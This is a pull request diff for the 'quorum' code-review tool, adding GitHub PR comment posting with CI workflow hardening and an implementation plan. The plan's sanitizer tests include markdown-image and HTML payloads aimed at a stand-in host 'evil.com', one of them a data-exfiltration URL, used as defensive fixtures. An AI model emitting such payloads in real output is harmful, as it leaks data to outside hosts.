### PR TITLE
feat(github): native PR comment support (#313)

### DIFF
--- a/.github/workflows/quorum-review-analyze.yml
+++ b/.github/workflows/quorum-review-analyze.yml
@@ -11,6 +11,7 @@ jobs:
       - uses: actions/checkout@v4
         with:
           persist-credentials: false
+          fetch-depth: 0
       - name: Install quorum
         run: cargo install --path . --locked
       - name: Generate PR diff
@@ -18,7 +19,7 @@ jobs:
         env:
           GH_TOKEN: ${{ github.token }}
       - name: Run review
-        run: quorum review --json --diff-file pr.diff $(git diff --name-only origin/${{ github.base_ref }}...HEAD) > findings.json
+        run: quorum review --json --diff-file pr.diff $(git diff --name-only ${{ github.event.pull_request.base.sha }}...HEAD) > findings.json
         env:
           QUORUM_BASE_URL: ${{ secrets.QUORUM_BASE_URL }}
           QUORUM_API_KEY: ${{ secrets.QUORUM_API_KEY }}

--- a/.github/workflows/quorum-review-analyze.yml
+++ b/.github/workflows/quorum-review-analyze.yml
@@ -1,11 +1,16 @@
 name: Quorum Review (analyze)
 on: [pull_request]
 
+permissions:
+  contents: read
+
 jobs:
   analyze:
     runs-on: ubuntu-latest
     steps:
       - uses: actions/checkout@v4
+        with:
+          persist-credentials: false
       - name: Install quorum
         run: cargo install --path . --locked
       - name: Generate PR diff
@@ -13,11 +18,15 @@ jobs:
         env:
           GH_TOKEN: ${{ github.token }}
       - name: Run review
-        run: quorum review --json --diff-file pr.diff $(git diff --name-only origin/main...HEAD) > findings.json
+        run: quorum review --json --diff-file pr.diff $(git diff --name-only origin/${{ github.base_ref }}...HEAD) > findings.json
         env:
           QUORUM_BASE_URL: ${{ secrets.QUORUM_BASE_URL }}
           QUORUM_API_KEY: ${{ secrets.QUORUM_API_KEY }}
+      - name: Copy quorum binary for report stage
+        run: cp $(which quorum) quorum-bin
       - uses: actions/upload-artifact@v4
         with:
           name: quorum-findings
-          path: findings.json
+          path: |
+            findings.json
+            quorum-bin

--- a/.github/workflows/quorum-review-analyze.yml
+++ b/.github/workflows/quorum-review-analyze.yml
@@ -1,0 +1,23 @@
+name: Quorum Review (analyze)
+on: [pull_request]
+
+jobs:
+  analyze:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: Install quorum
+        run: cargo install --path . --locked
+      - name: Generate PR diff
+        run: gh pr diff ${{ github.event.pull_request.number }} > pr.diff
+        env:
+          GH_TOKEN: ${{ github.token }}
+      - name: Run review
+        run: quorum review --json --diff-file pr.diff $(git diff --name-only origin/main...HEAD) > findings.json
+        env:
+          QUORUM_BASE_URL: ${{ secrets.QUORUM_BASE_URL }}
+          QUORUM_API_KEY: ${{ secrets.QUORUM_API_KEY }}
+      - uses: actions/upload-artifact@v4
+        with:
+          name: quorum-findings
+          path: findings.json

--- a/.github/workflows/quorum-review-analyze.yml
+++ b/.github/workflows/quorum-review-analyze.yml
@@ -22,11 +22,7 @@ jobs:
         env:
           QUORUM_BASE_URL: ${{ secrets.QUORUM_BASE_URL }}
           QUORUM_API_KEY: ${{ secrets.QUORUM_API_KEY }}
-      - name: Copy quorum binary for report stage
-        run: cp $(which quorum) quorum-bin
       - uses: actions/upload-artifact@v4
         with:
           name: quorum-findings
-          path: |
-            findings.json
-            quorum-bin
+          path: findings.json

--- a/.github/workflows/quorum-review-report.yml
+++ b/.github/workflows/quorum-review-report.yml
@@ -4,22 +4,33 @@ on:
     workflows: ["Quorum Review (analyze)"]
     types: [completed]
 
+permissions:
+  contents: read
+  pull-requests: write
+
 jobs:
   report:
     if: github.event.workflow_run.conclusion == 'success'
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
-      - name: Install quorum
-        run: cargo install --path . --locked
       - uses: actions/download-artifact@v4
         with:
           name: quorum-findings
           run-id: ${{ github.event.workflow_run.id }}
           github-token: ${{ secrets.GITHUB_TOKEN }}
+      - name: Make binary executable
+        run: chmod +x quorum-bin
+      - name: Validate head_sha format
+        run: |
+          HEAD_SHA="${{ github.event.workflow_run.head_sha }}"
+          if ! echo "$HEAD_SHA" | grep -qE '^[0-9a-f]{40}$'; then
+            echo "::error::Invalid head_sha format: $HEAD_SHA"
+            exit 1
+          fi
       - name: Post review
         run: |
-          PR_NUMBER=$(gh api repos/${{ github.repository }}/commits/${{ github.event.workflow_run.head_sha }}/pulls --jq '.[0].number')
-          quorum report findings.json --pr "$PR_NUMBER"
+          HEAD_SHA="${{ github.event.workflow_run.head_sha }}"
+          PR_NUMBER=$(gh api "repos/${{ github.repository }}/commits/${HEAD_SHA}/pulls" --jq '.[0].number')
+          ./quorum-bin report findings.json --pr "$PR_NUMBER"
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

--- a/.github/workflows/quorum-review-report.yml
+++ b/.github/workflows/quorum-review-report.yml
@@ -13,13 +13,17 @@ jobs:
     if: github.event.workflow_run.conclusion == 'success'
     runs-on: ubuntu-latest
     steps:
+      - uses: actions/checkout@v4
+        with:
+          persist-credentials: false
+          ref: main
+      - name: Install quorum from trusted main branch
+        run: cargo install --path . --locked
       - uses: actions/download-artifact@v4
         with:
           name: quorum-findings
           run-id: ${{ github.event.workflow_run.id }}
           github-token: ${{ secrets.GITHUB_TOKEN }}
-      - name: Make binary executable
-        run: chmod +x quorum-bin
       - name: Validate head_sha format
         run: |
           HEAD_SHA="${{ github.event.workflow_run.head_sha }}"
@@ -31,6 +35,6 @@ jobs:
         run: |
           HEAD_SHA="${{ github.event.workflow_run.head_sha }}"
           PR_NUMBER=$(gh api "repos/${{ github.repository }}/commits/${HEAD_SHA}/pulls" --jq '.[0].number')
-          ./quorum-bin report findings.json --pr "$PR_NUMBER"
+          quorum report findings.json --pr "$PR_NUMBER"
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

--- a/.github/workflows/quorum-review-report.yml
+++ b/.github/workflows/quorum-review-report.yml
@@ -1,0 +1,25 @@
+name: Quorum Review (report)
+on:
+  workflow_run:
+    workflows: ["Quorum Review (analyze)"]
+    types: [completed]
+
+jobs:
+  report:
+    if: github.event.workflow_run.conclusion == 'success'
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: Install quorum
+        run: cargo install --path . --locked
+      - uses: actions/download-artifact@v4
+        with:
+          name: quorum-findings
+          run-id: ${{ github.event.workflow_run.id }}
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+      - name: Post review
+        run: |
+          PR_NUMBER=$(gh api repos/${{ github.repository }}/commits/${{ github.event.workflow_run.head_sha }}/pulls --jq '.[0].number')
+          quorum report findings.json --pr "$PR_NUMBER"
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -30,6 +30,8 @@ cargo run -- review file.yaml --deep         # multi-turn agent loop
 cargo run -- review file.rs --diff-file d.patch  # change-scoped review
 cargo run -- review src/*.rs --parallel 4        # parallel LLM calls (default: 4)
 cargo run -- feedback --file src/main.rs --finding "SQL injection" --verdict tp --reason "Fixed"
+cargo run -- report findings.json --pr 42     # post findings to GitHub PR
+cargo run -- review src/*.rs --github-pr 42   # review + post to PR in one step
 cargo run -- serve                           # MCP server (stdio)
 cargo run -- daemon --watch-dir .            # persistent daemon
 ```
@@ -42,6 +44,7 @@ QUORUM_API_KEY=sk-...                          # enables LLM review
 QUORUM_MODEL=gpt-5.4                           # default model
 QUORUM_ENSEMBLE_MODELS=gpt-5.4,gemini-2.5-pro  # for --ensemble
 QUORUM_CONTEXT7_LIVE_REGISTRY=1                # enable live registry lookups (alt: --live-registry flag)
+GITHUB_TOKEN=ghp_...                           # GitHub API token for PR comments
 
 # HTTP timeouts (#117, v0.18.0+)
 QUORUM_HTTP_TIMEOUT=300        # total request timeout, seconds (default 300)

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -2714,7 +2714,7 @@ checksum = "a993555f31e5a609f617c12db6250dedcac1b0a85076912c436e6fc9b2c8e6a3"
 
 [[package]]
 name = "quorum"
-version = "0.26.0"
+version = "0.27.0"
 dependencies = [
  "anyhow",
  "assert_cmd",

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -1,6 +1,6 @@
 [package]
 name = "quorum"
-version = "0.26.0"
+version = "0.27.0"
 edition = "2024"
 # `str::floor_char_boundary` (used in src/agent.rs and src/tools.rs to
 # truncate UTF-8 safely) stabilized in Rust 1.93. Older constraints —

--- a/DESIGN.md
+++ b/DESIGN.md
@@ -23,15 +23,15 @@ Core principles:
 | Mode | When | Format | Audience |
 |------|------|--------|----------|
 | Human | stdout is a TTY, no flags | Styled findings, colored severity, headers | Terminal user |
-| Compact | `--compact` or `CLAUDE_CODE` env set | Token-optimized single-line records | LLM context window |
+| Compact | `--compact` or `CLAUDE_CODE` / `GITHUB_ACTIONS` env set | Token-optimized single-line records | LLM context window, CI logs |
 | JSON | `--json` flag or stdout is piped | Machine-parseable JSON | Scripts, pipes |
 
 Detection logic:
 
 ```
 if --json flag OR !stdout.is_terminal() -> JSON
-else if --compact or CLAUDE_CODE env    -> Compact
-else                                    -> Human
+else if --compact or CLAUDE_CODE or GITHUB_ACTIONS env -> Compact
+else                                                   -> Human
 ```
 
 ### Compact mode design (critical for LLM consumption)
@@ -468,7 +468,55 @@ No file contents, no finding text, no code snippets. Just counts and metadata. T
 
 ---
 
-## 13. Anti-patterns
+## 13. GitHub PR Comments
+
+When posting findings as GitHub PR review comments (`quorum report` or
+`quorum review --github-pr`), output uses GitHub-flavored Markdown
+consistent with the terminal format:
+
+### Inline comment (one per finding, on the diff line)
+
+```
+**!** Finding title — `category`
+
+Description text with suggested fix.
+
+*quorum 0.27.0 | model-name, source*
+```
+
+### Review body
+
+```
+<!-- quorum-review-marker:v1 run_id=... sha=... version=... -->
+
+## Quorum Review
+
+N findings (M critical, K warning, J info) | X inline, Y in summary
+
+### Findings outside changed lines
+
+**~** Title — `category` L42
+
+Description.
+
+*quorum 0.27.0 | source*
+```
+
+### Sanitization
+
+Always-on for PR comment bodies. Strips control characters, neutralizes
+@mentions and #refs (rendered as inline code), removes image/anchor HTML
+tags, escapes backtick runs of 3+, and truncates at 60,000 chars.
+
+### Re-run behavior
+
+Each review includes a `quorum-review-marker` HTML comment. On re-run,
+previous quorum reviews are dismissed (best-effort) before the new review
+is posted.
+
+---
+
+## 14. Anti-patterns
 
 Things this CLI will never do:
 

--- a/docs/superpowers/plans/2026-05-25-github-pr-comments.md
+++ b/docs/superpowers/plans/2026-05-25-github-pr-comments.md
@@ -1,0 +1,1940 @@
+# GitHub PR Comment Support Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Add native `quorum report` subcommand and `--github-pr` flag on `quorum review` to post findings as GitHub PR review comments with inline code positioning.
+
+**Architecture:** New `src/github_report.rs` module owns all GitHub API interaction. Both CLI entry points construct a `PostReviewRequest` and call `post_review()`. Output sanitization, commentability validation, and dismiss-and-replace logic live in this module. Existing output pipeline is unchanged.
+
+**Tech Stack:** Rust, reqwest (already in-tree), serde/serde_json, clap derive macros, GitHub REST API v2026-03-10
+
+**Design spec:** `docs/superpowers/specs/2026-05-25-github-pr-comments-design.md`
+
+---
+
+### Task 1: Output Sanitization (`sanitize_for_github`)
+
+The foundation — every other task that renders Markdown depends on this.
+
+**Files:**
+- Create: `src/github_report.rs`
+- Modify: `src/main.rs:1-28` (add `mod github_report;`)
+- Modify: `src/lib.rs` (add `pub mod github_report;` — not needed yet but keeps option open)
+
+- [ ] **Step 1: Write failing tests for sanitize_for_github**
+
+In `src/github_report.rs`, create the module with tests:
+
+```rust
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn sanitize_strips_control_chars() {
+        assert_eq!(sanitize_for_github("hello\x00world\x07"), "helloworld");
+    }
+
+    #[test]
+    fn sanitize_preserves_newlines_and_tabs() {
+        assert_eq!(sanitize_for_github("line1\nline2\tok"), "line1\nline2\tok");
+    }
+
+    #[test]
+    fn sanitize_escapes_triple_backticks() {
+        let input = "break ```out``` of fence";
+        let result = sanitize_for_github(input);
+        assert!(!result.contains("```"));
+    }
+
+    #[test]
+    fn sanitize_neutralizes_at_mentions() {
+        assert_eq!(
+            sanitize_for_github("ping @admin about this"),
+            "ping `@admin` about this"
+        );
+    }
+
+    #[test]
+    fn sanitize_neutralizes_issue_refs() {
+        assert_eq!(
+            sanitize_for_github("see #123 for details"),
+            "see `#123` for details"
+        );
+    }
+
+    #[test]
+    fn sanitize_strips_markdown_images() {
+        assert_eq!(
+            sanitize_for_github("text ![alt](http://evil.com/exfil?data=secret) more"),
+            "text  more"
+        );
+    }
+
+    #[test]
+    fn sanitize_strips_html_img_tags() {
+        assert_eq!(
+            sanitize_for_github("before <img src=\"http://evil.com\"> after"),
+            "before  after"
+        );
+    }
+
+    #[test]
+    fn sanitize_strips_html_anchor_tags() {
+        assert_eq!(
+            sanitize_for_github("click <a href=\"http://evil.com\">here</a> now"),
+            "click here now"
+        );
+    }
+
+    #[test]
+    fn sanitize_truncates_at_limit() {
+        let long = "x".repeat(65_000);
+        let result = sanitize_for_github(&long);
+        assert!(result.len() <= 60_000);
+    }
+
+    #[test]
+    fn sanitize_no_false_positive_on_email() {
+        // user@example.com should NOT be treated as @mention
+        assert_eq!(
+            sanitize_for_github("email user@example.com here"),
+            "email user@example.com here"
+        );
+    }
+
+    #[test]
+    fn sanitize_no_false_positive_on_hash_in_url() {
+        // fragment #section should not be treated as issue ref
+        assert_eq!(
+            sanitize_for_github("see docs.md#section"),
+            "see docs.md#section"
+        );
+    }
+}
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cargo test --bin quorum github_report -- --nocapture 2>&1 | head -40`
+Expected: compilation error — `sanitize_for_github` not defined
+
+- [ ] **Step 3: Implement sanitize_for_github**
+
+```rust
+use regex::Regex;
+use std::sync::LazyLock;
+
+const GITHUB_BODY_LIMIT: usize = 60_000;
+
+static RE_MENTION: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"(?<!\w)@([a-zA-Z0-9][-a-zA-Z0-9]*)").unwrap());
+
+static RE_ISSUE_REF: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"(?<!\w)#(\d+)").unwrap());
+
+static RE_MD_IMAGE: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"!\[[^\]]*\]\([^)]*\)").unwrap());
+
+static RE_HTML_IMG: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"(?i)<img[^>]*>").unwrap());
+
+static RE_HTML_ANCHOR: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"(?is)<a[^>]*>(.*?)</a>").unwrap());
+
+static RE_BACKTICK_RUN: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"(`{3,})").unwrap());
+
+pub fn sanitize_for_github(s: &str) -> String {
+    // 1. Strip control characters (keep \n, \t)
+    let mut out: String = s
+        .chars()
+        .filter(|c| !c.is_control() || *c == '\n' || *c == '\t')
+        .collect();
+
+    // 2. Escape backtick runs of 3+
+    out = RE_BACKTICK_RUN
+        .replace_all(&out, |caps: &regex::Captures| {
+            let ticks = &caps[1];
+            format!("`{}`", &ticks[1..])
+        })
+        .into_owned();
+
+    // 3. Strip HTML anchors (keep inner text)
+    out = RE_HTML_ANCHOR.replace_all(&out, "$1").into_owned();
+
+    // 4. Strip image tags
+    out = RE_MD_IMAGE.replace_all(&out, "").into_owned();
+    out = RE_HTML_IMG.replace_all(&out, "").into_owned();
+
+    // 5. Neutralize @mentions (but not emails)
+    out = RE_MENTION.replace_all(&out, "`@$1`").into_owned();
+
+    // 6. Neutralize #refs (but not URL fragments)
+    out = RE_ISSUE_REF.replace_all(&out, "`#$1`").into_owned();
+
+    // 7. Truncate
+    if out.len() > GITHUB_BODY_LIMIT {
+        out.truncate(GITHUB_BODY_LIMIT);
+        // Don't split in the middle of a multi-byte char
+        while !out.is_char_boundary(out.len()) {
+            out.pop();
+        }
+    }
+
+    out
+}
+```
+
+- [ ] **Step 4: Add `mod github_report;` to main.rs**
+
+In `src/main.rs`, after the existing `mod judge;` line (~line 53), add:
+
+```rust
+#[allow(dead_code)]
+mod github_report;
+```
+
+- [ ] **Step 5: Run tests to verify they pass**
+
+Run: `cargo test --bin quorum github_report -- --nocapture 2>&1 | tail -20`
+Expected: all 12 tests pass
+
+- [ ] **Step 6: Run clippy**
+
+Run: `cargo clippy --bin quorum -- -D warnings 2>&1 | tail -10`
+Expected: no warnings
+
+- [ ] **Step 7: Commit**
+
+```bash
+git add src/github_report.rs src/main.rs
+git commit -m "feat(github): add sanitize_for_github output sanitization (#313)"
+```
+
+---
+
+### Task 2: Markdown Rendering (finding -> comment body)
+
+Converts a `Finding` into the Markdown format for inline PR comments and review body entries.
+
+**Files:**
+- Modify: `src/github_report.rs`
+
+- [ ] **Step 1: Write failing tests for Markdown rendering**
+
+Add to `src/github_report.rs`:
+
+```rust
+use crate::finding::{Finding, Severity, Source};
+use crate::category::Category;
+
+fn severity_icon(sev: &Severity) -> &'static str {
+    match sev {
+        Severity::Critical => "!",
+        Severity::High => "!",
+        Severity::Medium => "~",
+        Severity::Low => "-",
+        Severity::Info => "-",
+    }
+}
+
+/// Render a finding as a Markdown inline review comment body.
+pub fn render_inline_comment(finding: &Finding, version: &str) -> String {
+    todo!()
+}
+
+/// Render a finding as a Markdown entry for the review body (out-of-diff).
+pub fn render_body_finding(finding: &Finding, version: &str) -> String {
+    todo!()
+}
+
+/// Render the full review body: marker + summary + out-of-diff findings.
+pub fn render_review_body(
+    marker: &str,
+    inline_count: usize,
+    body_findings: &[Finding],
+    version: &str,
+) -> String {
+    todo!()
+}
+
+// In tests module:
+#[test]
+fn render_inline_comment_critical() {
+    let f = Finding {
+        id: "test".into(),
+        title: "SQL injection".into(),
+        description: "User input flows to query".into(),
+        severity: Severity::Critical,
+        category: Category::Security,
+        source: Source::Llm("gpt-5.4".into()),
+        line_start: 42,
+        line_end: 42,
+        evidence: vec![],
+        calibrator_action: None,
+        similar_precedent: vec![],
+        canonical_pattern: None,
+        suggested_fix: None,
+        based_on_excerpt: None,
+        reasoning: None,
+        llm_confidence: None,
+        confidence: None,
+        cited_lines: None,
+        grounding_status: None,
+        grounding_confidence: None,
+        model_agreement: None,
+        rule_id: None,
+        judge_verdict: None,
+        judge_confidence: None,
+        precision_tier: None,
+        in_diff: Some(true),
+    };
+    let result = render_inline_comment(&f, "0.27.0");
+    assert!(result.contains("**!** SQL injection"));
+    assert!(result.contains("`security`"));
+    assert!(result.contains("User input flows to query"));
+    assert!(result.contains("*quorum 0.27.0 | gpt-5.4*"));
+}
+
+#[test]
+fn render_body_finding_includes_line() {
+    let f = Finding {
+        id: "test".into(),
+        title: "Token not rotated".into(),
+        description: "Session fixation risk".into(),
+        severity: Severity::Medium,
+        category: Category::Security,
+        source: Source::LocalAst,
+        line_start: 89,
+        line_end: 89,
+        evidence: vec![],
+        calibrator_action: None,
+        similar_precedent: vec![],
+        canonical_pattern: None,
+        suggested_fix: None,
+        based_on_excerpt: None,
+        reasoning: None,
+        llm_confidence: None,
+        confidence: None,
+        cited_lines: None,
+        grounding_status: None,
+        grounding_confidence: None,
+        model_agreement: None,
+        rule_id: None,
+        judge_verdict: None,
+        judge_confidence: None,
+        precision_tier: None,
+        in_diff: None,
+    };
+    let result = render_body_finding(&f, "0.27.0");
+    assert!(result.contains("**~** Token not rotated"));
+    assert!(result.contains("L89"));
+}
+
+#[test]
+fn render_review_body_clean() {
+    let body = render_review_body(
+        "<!-- quorum-review-marker:v1 -->",
+        0,
+        &[],
+        "0.27.0",
+    );
+    assert!(body.contains("quorum-review-marker"));
+    assert!(body.contains("No findings."));
+}
+
+#[test]
+fn render_review_body_with_summary() {
+    let f = Finding {
+        id: "test".into(),
+        title: "Issue".into(),
+        description: "Desc".into(),
+        severity: Severity::High,
+        category: Category::Security,
+        source: Source::LocalAst,
+        line_start: 10,
+        line_end: 10,
+        evidence: vec![],
+        calibrator_action: None,
+        similar_precedent: vec![],
+        canonical_pattern: None,
+        suggested_fix: None,
+        based_on_excerpt: None,
+        reasoning: None,
+        llm_confidence: None,
+        confidence: None,
+        cited_lines: None,
+        grounding_status: None,
+        grounding_confidence: None,
+        model_agreement: None,
+        rule_id: None,
+        judge_verdict: None,
+        judge_confidence: None,
+        precision_tier: None,
+        in_diff: None,
+    };
+    let body = render_review_body(
+        "<!-- quorum-review-marker:v1 -->",
+        2,
+        &[f],
+        "0.27.0",
+    );
+    assert!(body.contains("## Quorum Review"));
+    assert!(body.contains("3 findings"));
+    assert!(body.contains("2 inline, 1 in summary"));
+    assert!(body.contains("Findings outside changed lines"));
+}
+
+#[test]
+fn render_review_body_truncates_overflow() {
+    let findings: Vec<Finding> = (0..500).map(|i| Finding {
+        id: format!("f{i}"),
+        title: format!("Finding {i} with a long title that takes space"),
+        description: "x".repeat(200),
+        severity: Severity::Low,
+        category: Category::Style,
+        source: Source::LocalAst,
+        line_start: i as u32 + 1,
+        line_end: i as u32 + 1,
+        evidence: vec![],
+        calibrator_action: None,
+        similar_precedent: vec![],
+        canonical_pattern: None,
+        suggested_fix: None,
+        based_on_excerpt: None,
+        reasoning: None,
+        llm_confidence: None,
+        confidence: None,
+        cited_lines: None,
+        grounding_status: None,
+        grounding_confidence: None,
+        model_agreement: None,
+        rule_id: None,
+        judge_verdict: None,
+        judge_confidence: None,
+        precision_tier: None,
+        in_diff: None,
+    }).collect();
+    let body = render_review_body(
+        "<!-- quorum-review-marker:v1 -->",
+        0,
+        &findings,
+        "0.27.0",
+    );
+    assert!(body.len() <= 60_000);
+    assert!(body.contains("additional findings omitted"));
+}
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cargo test --bin quorum github_report -- --nocapture 2>&1 | head -30`
+Expected: FAIL — `todo!()` panics
+
+- [ ] **Step 3: Implement rendering functions**
+
+```rust
+fn severity_icon(sev: &Severity) -> &'static str {
+    match sev {
+        Severity::Critical | Severity::High => "!",
+        Severity::Medium => "~",
+        Severity::Low | Severity::Info => "-",
+    }
+}
+
+fn source_label(source: &Source) -> &str {
+    source.provider_name()
+}
+
+pub fn render_inline_comment(finding: &Finding, version: &str) -> String {
+    let icon = severity_icon(&finding.severity);
+    let cat = finding.category.as_str();
+    let source = source_label(&finding.source);
+    let mut out = format!(
+        "**{}** {} — `{}`\n\n{}\n\n*quorum {} | {}*",
+        icon,
+        sanitize_for_github(&finding.title),
+        cat,
+        sanitize_for_github(&finding.description),
+        version,
+        source,
+    );
+    if out.len() > GITHUB_BODY_LIMIT {
+        out.truncate(GITHUB_BODY_LIMIT);
+        while !out.is_char_boundary(out.len()) {
+            out.pop();
+        }
+    }
+    out
+}
+
+pub fn render_body_finding(finding: &Finding, version: &str) -> String {
+    let icon = severity_icon(&finding.severity);
+    let cat = finding.category.as_str();
+    let line = finding.anchor_line();
+    let source = source_label(&finding.source);
+    format!(
+        "**{}** {} — `{}` L{}\n\n{}\n\n*quorum {} | {}*",
+        icon,
+        sanitize_for_github(&finding.title),
+        cat,
+        line,
+        sanitize_for_github(&finding.description),
+        version,
+        source,
+    )
+}
+
+const REVIEW_BODY_LIMIT: usize = 55_000;
+
+pub fn render_review_body(
+    marker: &str,
+    inline_count: usize,
+    body_findings: &[Finding],
+    version: &str,
+) -> String {
+    use std::fmt::Write;
+    let mut out = String::with_capacity(4096);
+    writeln!(out, "{}\n", marker).unwrap();
+
+    let total = inline_count + body_findings.len();
+    writeln!(out, "## Quorum Review\n").unwrap();
+
+    if total == 0 {
+        writeln!(out, "No findings.").unwrap();
+        return out;
+    }
+
+    // Summary line
+    let summary = format_summary_counts(inline_count, body_findings);
+    writeln!(out, "{}\n", summary).unwrap();
+
+    if body_findings.is_empty() {
+        return out;
+    }
+
+    writeln!(out, "### Findings outside changed lines\n").unwrap();
+
+    let mut rendered_count = 0;
+    for f in body_findings {
+        let entry = render_body_finding(f, version);
+        if out.len() + entry.len() + 100 > REVIEW_BODY_LIMIT {
+            let remaining = body_findings.len() - rendered_count;
+            writeln!(
+                out,
+                "\n... {} additional findings omitted from review body. See CI artifact for full results.",
+                remaining
+            ).unwrap();
+            break;
+        }
+        writeln!(out, "{}\n", entry).unwrap();
+        rendered_count += 1;
+    }
+
+    out
+}
+
+fn format_summary_counts(inline_count: usize, body_findings: &[Finding]) -> String {
+    use crate::finding::Severity;
+    let all_body_sevs: Vec<&Severity> = body_findings.iter().map(|f| &f.severity).collect();
+    let total = inline_count + body_findings.len();
+
+    let mut crits = 0u32;
+    let mut warns = 0u32;
+    let mut infos = 0u32;
+    for s in &all_body_sevs {
+        match s {
+            Severity::Critical | Severity::High => crits += 1,
+            Severity::Medium => warns += 1,
+            Severity::Low | Severity::Info => infos += 1,
+        }
+    }
+    // Note: inline findings' severities are not available here — they are
+    // tracked by count only. The summary approximates with body counts.
+    let mut parts = Vec::new();
+    if crits > 0 { parts.push(format!("{} critical", crits)); }
+    if warns > 0 { parts.push(format!("{} warning", warns)); }
+    if infos > 0 { parts.push(format!("{} info", infos)); }
+
+    let sev_summary = if parts.is_empty() {
+        String::new()
+    } else {
+        format!(" ({})", parts.join(", "))
+    };
+
+    let location = if body_findings.is_empty() {
+        String::new()
+    } else {
+        format!(" | {} inline, {} in summary", inline_count, body_findings.len())
+    };
+
+    format!("{} findings{}{}", total, sev_summary, location)
+}
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cargo test --bin quorum github_report -- --nocapture 2>&1 | tail -20`
+Expected: all tests pass
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add src/github_report.rs
+git commit -m "feat(github): add Markdown rendering for PR comments (#313)"
+```
+
+---
+
+### Task 3: Commentability Validation
+
+Classify each finding as inline-commentable or body-only based on the PR diff.
+
+**Files:**
+- Modify: `src/github_report.rs`
+
+- [ ] **Step 1: Write failing tests**
+
+```rust
+#[test]
+fn classify_finding_in_diff_and_commentable() {
+    let diff = "--- a/src/auth.rs\n+++ b/src/auth.rs\n@@ -40,5 +40,7 @@\n context\n+added line\n+another\n context\n";
+    let ranges = crate::hydration::parse_unified_diff(diff);
+    let f = make_finding("test", 41, true);
+    let target = classify_posting_target(&f, "src/auth.rs", &ranges);
+    assert_eq!(target, PostingTarget::Inline);
+}
+
+#[test]
+fn classify_finding_in_diff_but_not_commentable() {
+    let diff = "--- a/src/auth.rs\n+++ b/src/auth.rs\n@@ -40,3 +40,5 @@\n context\n+added\n+added\n context\n";
+    let ranges = crate::hydration::parse_unified_diff(diff);
+    // Line 100 is marked in_diff but not in any hunk range
+    let f = make_finding("test", 100, true);
+    let target = classify_posting_target(&f, "src/auth.rs", &ranges);
+    assert_eq!(target, PostingTarget::Body);
+}
+
+#[test]
+fn classify_finding_not_in_diff() {
+    let diff = "--- a/src/auth.rs\n+++ b/src/auth.rs\n@@ -40,3 +40,5 @@\n context\n+added\n+added\n context\n";
+    let ranges = crate::hydration::parse_unified_diff(diff);
+    let f = make_finding("test", 41, false);
+    let target = classify_posting_target(&f, "src/auth.rs", &ranges);
+    assert_eq!(target, PostingTarget::Body);
+}
+
+#[test]
+fn classify_finding_file_not_in_diff() {
+    let diff = "--- a/src/other.rs\n+++ b/src/other.rs\n@@ -1,3 +1,5 @@\n+new\n+new\n old\n";
+    let ranges = crate::hydration::parse_unified_diff(diff);
+    let f = make_finding("test", 1, true);
+    let target = classify_posting_target(&f, "src/auth.rs", &ranges);
+    assert_eq!(target, PostingTarget::Body);
+}
+
+// Helper
+fn make_finding(id: &str, line: u32, in_diff: bool) -> Finding {
+    Finding {
+        id: id.into(),
+        title: "Test finding".into(),
+        description: "Desc".into(),
+        severity: Severity::Medium,
+        category: Category::Security,
+        source: Source::LocalAst,
+        line_start: line,
+        line_end: line,
+        evidence: vec![],
+        calibrator_action: None,
+        similar_precedent: vec![],
+        canonical_pattern: None,
+        suggested_fix: None,
+        based_on_excerpt: None,
+        reasoning: None,
+        llm_confidence: None,
+        confidence: None,
+        cited_lines: None,
+        grounding_status: None,
+        grounding_confidence: None,
+        model_agreement: None,
+        rule_id: None,
+        judge_verdict: None,
+        judge_confidence: None,
+        precision_tier: None,
+        in_diff: Some(in_diff),
+    }
+}
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cargo test --bin quorum github_report::tests::classify -- --nocapture 2>&1 | head -20`
+Expected: compilation error — types not defined
+
+- [ ] **Step 3: Implement commentability validation**
+
+```rust
+use crate::hydration::DiffRanges;
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum PostingTarget {
+    Inline,
+    Body,
+}
+
+pub fn classify_posting_target(
+    finding: &Finding,
+    file_path: &str,
+    diff_ranges: &DiffRanges,
+) -> PostingTarget {
+    if finding.in_diff != Some(true) {
+        return PostingTarget::Body;
+    }
+
+    let anchor = finding.anchor_line();
+
+    for (path, ranges) in diff_ranges {
+        if path == file_path {
+            for &(start, end) in ranges {
+                if anchor >= start && anchor <= end {
+                    return PostingTarget::Inline;
+                }
+            }
+            return PostingTarget::Body;
+        }
+    }
+
+    PostingTarget::Body
+}
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cargo test --bin quorum github_report::tests::classify -- --nocapture 2>&1 | tail -10`
+Expected: all 4 tests pass
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add src/github_report.rs
+git commit -m "feat(github): add commentability validation against diff hunks (#313)"
+```
+
+---
+
+### Task 4: Repo URL Parsing and GitHub Context Resolution
+
+Parse `owner/repo` from git remote URLs and environment variables.
+
+**Files:**
+- Modify: `src/github_report.rs`
+
+- [ ] **Step 1: Write failing tests**
+
+```rust
+#[test]
